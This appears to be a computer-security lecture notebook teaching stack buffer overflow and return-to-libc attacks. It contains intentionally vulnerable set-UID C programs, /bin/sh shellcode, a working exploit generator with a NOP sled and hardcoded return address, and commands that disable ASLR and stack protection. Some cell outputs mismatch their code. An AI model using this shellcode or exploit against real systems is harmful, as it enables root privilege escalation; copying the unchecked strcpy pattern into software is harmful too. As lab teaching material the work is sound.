## <center> Return-to-libc Attack </center>

### Stack-based Buffer Overflow Attack

- Malicious data are used to overflow a function'return address in order to get the program to *jump* to a different location on the stack which stores malicious code. 
- This can be countered by making the stack non-executable

In [ ]:
%%writefile source/shellcode.c
#include <string.h>

const char code[] =
  "\x31\xc0\x50\x68//sh\x68/bin"
  "\x89\xe3\x50\x53\x89\xe1\x99"
  "\xb0\x0b\xcd\x80";

int main(int argc, char **argv)
{
   char buffer[sizeof(code)];
   strcpy(buffer, code);
   ((void(*)( ))buffer)( );
}

In a terminal, run the following commands:

```
$ gcc -z execstack -o shellcode Computer-Security/source/shellcode.c
$ ./shellcode
$ gcc -z noexecstack shellcode Computer-Security/source/shellcode.c
$ ./shellcode
```

- Good countermeasure, but not enough.
- If the stack is not executable, an alternative solution is to make the program jump to where there are executable codes.
- Enter the region for standard C library on Linux, called **libc**

<center> <img src="figure/return-to-libc/libc1.jpg" width="700"/>

In [1]:
%%writefile source/stack.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int vul_func(char *str)
{
    char buffer[50];

    /* The following statement has a buffer overflow problem */
    strcpy(buffer, str);    

    return 1;
}

int main(int argc, char **argv)
{
    char str[240];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 200, badfile);
    vul_func(str);

    printf("Returned Properly\n");
    return 1;
}

Overwriting source/mem_layout.c


Run the followings:

```
$ gcc -fno-stack-protector -z noexecstack -o stack Computer-Security/source/stack.c
$ sudo sysctl -w kernel.randomize_va_space=0
```
- `-fno-stack-protector`: disable protection against changes in stack
- `-z noexecstack`: actually turn on protection against executable stack
- `kernel.randomize_va_space=0`: disable address space layout randomization

Afterward, turn the programinto a root-owned set-UID program


### Launch the Return-to-libc Attack

- Task A: find where in memory is `system()` located
- Task B: find the address of the `/bin/sh` string
- Task C: where to place the address of `/bin/sh` in the stack so that `system()` can get to it

#### Task A: Find the address of the system() function

Anytime a program runs, the libc library will be loaded into memory. Using `gdb`, we can find out the location of `system()`with the following commands:

```
$ gdb stack
(gdb-peda)$ run
(gdb-peda)$ p system
(gdb-peda)$ p exit
(gdb-peda)$ quit
```

#### Exercise:

Rerun the above process with a different program (pick one from our previous lectures) to confirm that the locations of `system` and `exit` do not change. 

#### Task B: Find the Address of the String "/bin/sh"

- We want `system()` to execute `/bin/sh`
- Therefore, `/bin/sh` must be in memory, and its address should be passed to `system()` as an argument. 
  - We cannot embed this in the source code (no access to source code of vulnerable program)
- Solution:
  - Utilize environment variables


In [1]:
%%writefile source/find_myshell.c
#include <stdio.h>

int main()
{
  char *shell = (char *) getenv("MYSHELL");
  if (shell) {
    printf ("Value: %s\n", shell);
    printf ("Address: %x\n", (unsigned int)shell); 
  }
  return 1;
}

Overwriting source/mem_layout_print.c


Run the followings:

```
$ gcc -o find_myshell55 Computer-Security/source/find_myshell.c
$ export MYSHELL="/bin/sh"
$ ./find_myshell55
```

Recompile find_myshell.c to a file named `myshell77`. Rerun the program. Is the address for `/bin/sh` still the same? Why?

<center> <img src="figure/buffer-overflow/bo2.png" width="400"/>

In [6]:
%%writefile source/stack_trace.c
#include<stdio.h>
static void display(int i, int *ptr);
    
int main(void) {
 int x = 5;
 int *xptr = &x;
 printf("In main():\n");
 printf("   x is %d and is stored at %p.\n", x, &x);
 printf("   xptr points to %p which holds %d.\n", xptr, *xptr);
 display(x, xptr);
 printf ("The display function has stopped");
 return 0;
}
   
void display(int z, int *zptr) {
  printf("In display():\n");
  printf("   z is %d and is stored at %p.\n", z, &z);
  printf("   zptr points to %p which holds %d.\n", zptr, *zptr);
}

Overwriting source/stack_trace.c


Run the followings:

```
$ gcc -g -o stack_trace Computer-Security/source/stack_trace.c
$ ./stack_trace
$ gdb stack_trace
gdb-peda$ 
```

In Class: Alternate between `run`, `break 10`, `backtrace`, `step`, and `n` to see how stack grows. `quit` to quit `gdb`.

```
gdb-peda$ run
gdb-peda$ break 10
gdb-peda$ run
gdb-peda$ backtrace
gdb-peda$ step
gdb-peda$ backtrace
gdb-peda$ n
gdb-peda$ n
gdb-peda$ n
gdb-peda$ backtrace
gdb-peda$ n
gdb-peda$ backtrace
gdb-peda$ n
gdb-peda$ backtrace
gdb-peda$ n
gdb-peda$ n
gdb-peda$ backtrace
```


<center> <img src="figure/buffer-overflow/bo3.png" width="400"/>

### Buffer Overflow Attack

- Memory copy happens in programming when data from one place (source) is duplicated to another place (destination). 
- Before copying can happen, memory needs to be allocated at the destination. 
- If the allocation fails to be sufficient, it will result in an overflow. 
- One of the oldest and most well-known attacks.

#### Why do we need to learn this vulnerability and attack?

- Can still be found buried in legacy or glue code from third party libraries as web sites get more complex and evolved.
- An important point of learning as you work through the theory and practice of this exploit:
  - C programming
  - C Assembler
  - Linux debugger using gdb
  - Engage in mathematics to understand the breaking points and the hex contents in memory in order to place an attack

**[Smashing the Stack, 2016](https://www.aap3recruitment.com/news/smashing-the-stack/14074/)**

**strcpy()**

In [7]:
%%writefile source/test_strcpy.c
#include <string.h>
#include <stdio.h>
void main(){
  char src[40] = "Hello World \0 Extra string";
  char dest[40];
  strcpy(dest, src);
  printf("%s",dest);
}

Overwriting source/test_strcpy.c


Compile and run `test_strcpy` in your terminal.
- What happens? Why is the string not copied properly?

In [8]:
%%writefile source/strcpy_overflow.c
#include <string.h>

void foo(char *str)
{
    char buffer[12];

    /* The following statement will result in buffer overflow */ 
    strcpy(buffer, str);
}

int main()
{
    char *str = "This is definitely longer than 12";    
    foo(str);

    return 1;
}

Overwriting source/strcpy_overflow.c


Run the followings:
```
$ gcc -o strcpy_overflow Computer-Security/source/strcpy_overflow.c
$ ./strcpy_overflow
```

Run the followings:
```
$ gcc -z execstack -fno-stack-protector -o strcpy_overflow Computer-Security/source/strcpy_overflow.c
$ ./strcpy_overflow
```

Run the gdb debugging sequence. Examing the frames at each backtrace. What happens to the last backtrace?
```
gdb-peda$ break 14
gdb-peda$ run
gdb-peda$ backtrace
gdb-peda$ step
gdb-peda$ backtrace
gdb-peda$ n
gdb-peda$ backtrace
```

<center> <img src="figure/buffer-overflow/bo4.png" width="400"/>

- The region above the buffer includes critical values, including the return address and the previous frame pointer. 
- The consequences of a modified return address (due to buffer overflow) include:
  - The new address (virtual address) might not be mapped to any physical address, leading to an invalid return instruction and a crashed program. 
  - The address might be mapped to a physical address in protected system space, leading to a failed jump and a crashed program. 
  - The address might be mapped to a physical address that does not contain any valid instruction, leading to a failed return and a crashed program. 
  - **The address might be mapped to a physical address that happens to contain valid machine instructions, leading to a continuing program with logic different from the original program.**

#### Exploiting a Buffer Overflow Vulnerability

- By overflowing a buffer, we can cause the program to crash or run something else. 
- If the program is privileged, this means *something else* will be run with privilige, leading to potential privilege escalation for *something malicious*. 

In [2]:
%%writefile source/stack.c
/* stack.c */
/* This program has a buffer overflow vulnerability. */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int foo(char *str)
{
    char buffer[100];
    printf ("I am here");
    /* The following statement has a buffer overflow problem */ 
    strcpy(buffer, str);

    return 1;
}

int main(int argc, char **argv)
{
    char str[400];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 300, badfile);
    foo(str);

    printf("Returned Properly\n");
    return 1;
}


Overwriting source/stack.c


- Clearly, there is a buffer overflow issue.
- What needs to be store in `badfile` to expoit this issue?

<center> <img src="figure/buffer-overflow/bo5.png" width="500"/>

Disable countermeasures:
```
$ sudo sysctl -w kernel.randomize_va_space=0
```
Include the following flags with your gcc:
- `-z execstack`
- `-fno-stack-protector`

Run the followings:
```
$ gcc -o stack -z execstack -fno-stack-protector Computer-Security/source/stack.c
$ sudo chown root stack
$ sudo chmod 4755 stack
$ echo "aaaa" > badfile
$ ./stack
$ echo "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" > badfile
$ ./stack
```

How do we know (guess) where the stack frame of `foo()` will be for us to find out where the malicious code is located (and hence set the relevant jump address)?
- Fixed starting address of the stack (before countermeasure). 
- The stack is shallow (good programming practice don't use deeply nested functions). 

Disable the address randomization and then run `mem_layout_print` to see if the addresses for the pointers in stack are changed?

<center> <img src="figure/buffer-overflow/bo6.png" width="500"/>

How can we find the return address without guessing?

Run the followings:
```
$ gcc -g -o stack_dbg -z execstack -fno-stack-protector Computer-Security/source/stack.c
$ rm badfile
$ touch badfile
$ gdb stack_dbg
gdb-peda$ break foo
gdb-peda$ run
gdb-peda$ print $ebp
gdb-peda$ print &buffer
gdb-peda$ print ebp - buffer
gdb-peda$ quit
```

- What is 0x6C in decimal?

<center> <img src="figure/buffer-overflow/bo7.png" width="500"/>

The next body of code will need to be modified anytime you retest this program, after going through the debugging process to identify the correct stack position.

In [23]:
%%writefile source/exploit.c
/* exploit.c  */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
    "\x31\xc0"             /* xorl    %eax,%eax     */
    "\x50"                 /* pushl   %eax          */
    "\x68""//sh"           /* pushl   $0x68732f2f   */
    "\x68""/bin"           /* pushl   $0x6e69622f   */
    "\x89\xe3"             /* movl    %esp,%ebx     */
    "\x50"                 /* pushl   %eax          */
    "\x53"                 /* pushl   %ebx          */
    "\x89\xe1"             /* movl    %esp,%ecx     */
    "\x99"                 /* cdq                   */
    "\xb0\x0b"             /* movb    $0x0b,%al     */
    "\xcd\x80"             /* int     $0x80         */
;

void main(int argc, char **argv)
{
  char buffer[200];
  FILE *badfile;

  /* A. Initialize buffer with 0x90 (NOP instruction) */
  memset(&buffer, 0x90, 200);

  /* B. Fill the return address field with a candidate 
        entry point of the malicious code - This needs to be changed everytime you run the vulnerable program. 
        If this does not work, change x80 to a different value and try again. 
    
    */
  *((long *) (buffer + 112)) = 0xbfffe968 + 0x16;
	
  // C. Place the shellcode towards the end of buffer
  memcpy(buffer + sizeof(buffer) - sizeof(shellcode), shellcode, 
         sizeof(shellcode));

  /* Save the contents to the file "badfile" */
  badfile = fopen("./badfile", "w");
  fwrite(buffer, 200, 1, badfile);
  fclose(badfile);
}

Overwriting source/exploit.c


Run the followings (after modify exploit.c accordingly)
```
$ rm badfile
$ gcc -o exploit Computer-Security/source/exploit.c
$ ./exploit
$ ./stack
```

### Countermeasures

#### General approaches

- Safer functions: specification of maximum data length to be copied
- Safer dynamic link library: dynamic link to safer libraries (as opposed to calling unsafe functions)
- Program static analyzer: warn of code patterns that could lead to buffer overflow
- Programming language: self-check against buffer overflow in the language
- Compiler: -fno-stack-protector
- Operating system: kernel.randomize_va_space